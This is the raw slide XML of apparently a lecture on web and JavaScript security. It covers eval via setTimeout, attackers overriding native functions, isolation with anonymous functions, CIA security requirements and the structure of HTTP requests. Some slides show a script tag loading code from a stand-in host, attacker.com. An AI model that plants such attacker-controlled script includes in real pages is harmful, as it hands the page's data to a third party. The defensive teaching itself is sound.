        <p:txBody>
          <a:bodyPr lIns="101370" tIns="50685" rIns="101370" bIns="50685"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1013719" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="31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 with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" b="1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setTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="31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:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="35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defTabSz="1013719" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="31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what is the result of executing this code?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="31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98988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happens now?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49155" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="970781" y="1202631"/>
            <a:ext cx="7920881" cy="6206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=somecode.js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&gt;&lt;/script&gt;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(x) {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    if (x &lt;= 1) {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        return 1;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    return x*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(x-1);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r =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(4);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s = "alert("+r+")"</a:t>
            </a:r>
          </a:p>
          <a:p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setTimeout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(s, 100)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783013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Important detail: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="31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3100" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Native functions code can be rewritten</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3500" dirty="0"/>
          </a:p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Security problem:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>If attacker rewrites code of native function, when trusted code calls a native function, it is executing code of attacker!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3100" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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85378" y="49386"/>
            <a:ext cx="9134475" cy="1265238"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0"/>
              <a:t>Leaks via native functions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942107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500" dirty="0"/>
              <a:t>Importance of Protecting Web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71652"/>
            <a:ext cx="4483100" cy="5565775"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="40544" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Web applications everywhere in your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>life</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1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Important Information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Identity </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Financial situation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Social life</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security Requirements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Confidentiality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Availability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88175" y="1406527"/>
            <a:ext cx="1824038" cy="132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05527" y="1895477"/>
            <a:ext cx="1765300" cy="128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图示 7"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7064914" y="3675771"/>
          <a:ext cx="3188001" cy="1974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667377" y="2587628"/>
            <a:ext cx="1862138" cy="130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416552" y="3346450"/>
            <a:ext cx="1889125" cy="137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isolation without sop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50365078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Anonymous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want to execute code only once, in isolation from attacker, you can use anonymous functions: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&lt;script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/>
              <a:t>attacker.com/code.js&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt;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&lt;script&gt;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(function(){  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some private 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} ())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Attacker cannot access memory of some code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But code is still vulnerable if it uses native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28336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Anonymous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want to define an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and expose it to attacker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&lt;script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/>
              <a:t>attacker.com/code.js&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt;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&lt;script&gt;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(function(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/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			some private 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function(){some public code}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 ())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&lt;/script&gt;</a:t>
            </a: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742932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Important detail: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="31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3100" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>They are not linked by the global object</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3500" dirty="0"/>
          </a:p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Security solution?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>They help to encapsulate state but attacker can still read its code via  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>() if SOP does not apply and there is no CSFR prevention. Code of named functions can be read with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3100" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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85378" y="49386"/>
            <a:ext cx="9134475" cy="1265238"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0"/>
              <a:t>Anonymous functions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82302157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General JavaScript security measures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Do not expose “window” to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> code: any code coming from another server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> code: any code coming from the client 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Watch out for implicit  type coercions (like calls to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)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Avoid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>evals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (explicit or implicit)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Make sure that native functions execute original code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721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Security problems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="338138" y="2108200"/>
            <a:ext cx="9136062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362" tIns="50681" rIns="101362" bIns="50681"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="301599" indent="-301599" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="663"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="27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0" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="663"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pP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Availability violation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="202741" lvl="0" indent="-202741" defTabSz="1013704" fontAlgn="auto"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</a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>service or resource is made </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>unavailable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3366FF"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="663"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2700" dirty="0" smtClean="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="663"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/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Confidentiality violation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="301599" indent="-301599" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="663"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366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Unauthorized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366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disclosure of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3366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01599" indent="-301599" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="663"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="27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0" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="663"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/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Integrity 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violation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="202741" lvl="0" indent="-202741" defTabSz="1013704" fontAlgn="auto"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</a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366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Unauthorized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366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modification of data (authenticity of data), and unauthorized execution of programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="663"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2700" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="301599" indent="-301599" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="663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endParaRPr lang="en-US" sz="2700" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="301599" indent="-301599" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="663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</a:pPr>
            <a:endParaRPr lang="en-US" sz="2700" dirty="0"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state in web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>apps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71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618853" y="626567"/>
            <a:ext cx="83820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500" dirty="0"/>
              <a:t>HTTP: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0" err="1"/>
              <a:t>HyperText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0"/>
              <a:t> Transfer Protocol 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270123" y="2172446"/>
            <a:ext cx="9845675" cy="5222875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP important characteristic: no State  request/response - each request is independent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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HTTP header: header section of requests and responses, parameters of the HTTP transaction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="fr-FR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482551"/>
            <a:ext cx="9135428" cy="996645"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Grouper 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="250701" y="1706687"/>
            <a:ext cx="8632623" cy="5042325"/>
            <a:chOff x="164458" y="1198211"/>
            <a:chExt cx="8632623" cy="5042325"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="84996" name="Text Box 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2097063" y="2069639"/>
              <a:ext cx="6700018" cy="417089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101362" tIns="50681" rIns="101362" bIns="50681"/>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>GET /index.html HTTP/1.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Host: www.example.com</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>User-Agent: Mozilla/5.0</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Accept: text/html, */*</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Accept-Language: en-us</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Accept-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2700" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Charset</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>: ISO-8859-1,utf-8</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Connection: keep-alive</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2700" i="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="folHlink"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>blank line</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="2700" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="84997" name="Text Box 5"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3702459" y="1198211"/>
              <a:ext cx="692497" cy="415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2700" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="folHlink"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>URL</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="84998" name="Line 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4042568" y="1602299"/>
              <a:ext cx="0" cy="590321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med" len="lg"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="101362" tIns="50681" rIns="101362" bIns="50681"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="84999" name="Line 7"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6326425" y="1602299"/>
              <a:ext cx="0" cy="590321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med" len="lg"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="101362" tIns="50681" rIns="101362" bIns="50681"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="85000" name="Text Box 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5064639" y="1198211"/>
              <a:ext cx="2520049" cy="415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700" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="folHlink"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Protocol Version</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="85001" name="Line 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2519996" y="1602299"/>
              <a:ext cx="0" cy="590321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med" len="lg"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="101362" tIns="50681" rIns="101362" bIns="50681"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="85002" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1949034" y="1198211"/>
              <a:ext cx="1154163" cy="415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2700" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="folHlink"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Method</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="85003" name="AutoShape 11"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1758713" y="2614280"/>
              <a:ext cx="169175" cy="2276951"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 112500"/>
                <a:gd name="adj2" fmla="val 50000"/>
              </a:avLst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lIns="101362" tIns="50681" rIns="101362" bIns="50681" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="85004" name="Text Box 12"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="326014" y="3559494"/>
              <a:ext cx="1308050" cy="415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2700" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="folHlink"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Headers</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="85005" name="AutoShape 13"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1820642" y="5806723"/>
              <a:ext cx="124866" cy="349481"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 27778"/>
                <a:gd name="adj2" fmla="val 50000"/>
              </a:avLst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lIns="101362" tIns="50681" rIns="101362" bIns="50681" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="85006" name="Text Box 14"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="164458" y="5444596"/>
              <a:ext cx="1442703" cy="567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2700" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="folHlink"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Body</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="2700" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="folHlink"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="2700" dirty="0">
